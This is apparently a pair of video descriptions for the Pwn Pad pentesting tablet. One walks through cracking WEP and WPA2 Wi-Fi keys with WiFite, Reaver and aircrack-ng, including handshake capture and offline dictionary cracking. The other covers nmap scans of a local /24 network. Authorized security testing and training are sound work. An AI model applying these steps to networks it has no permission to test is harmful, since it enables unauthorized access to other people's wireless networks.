This video covers how to use WiFite on the Pwn Pad. Launch WiFite (in the wireless tools folder), the set-it-and-forget-it of wireless pentesting apps. Select the TP-Link adapter (as it supports packet injection), an adapter that comes with the Pwn Pad, and WiFite puts it into monitor mode automatically to find and list access points. If it sees anything running WEP, WiFite will run through six different attacks, usually recovering the key after roughly 10,000 captured packets (often in under two minutes). To crack WPA2, press the Volume Down key on the Pwn Pad followed by the letter C (Control-C) and select the number of the access point you want to attack. A Reaver (WPS PIN) attack will be launched first, which usually takes about 8-10 hours; WiFite then attempts to capture the WPA 4-way handshake and hands the capture and BSSID to aircrack-ng to work out what the passphrase may be. By default, we don’t run the dictionary attack (as it uses quite a bit of battery). Instead, we recommend going to the applications folder and running the “captures dump” application with a USB stick, which copies the capture file directly to the stick so you can crack it on a laptop or desktop running Kali Linux. In this particular case, the key was found in the dictionary file. Once you connect to the access point with the recovered key, you can switch to a different type of attack.

For more information, go to code.google.com/p/wifite or www.aircrack-ng.org.

How to Use Nmap on the Pwn Pad

This video demonstrates using nmap on the Pwn Pad, both with the one-touch functionality and from the command line. The video covers the various adapters that can be used with the Pwn Pad and how to choose which one you are using: the TP-Link adapter, the TRENDnet USB Ethernet adapter, the onboard Nexus adapter, or EvilAP. Nmap will determine the device’s own IP address and scan that network’s /24 (class C), and you can then run a common service scan or use nmap’s other functionality.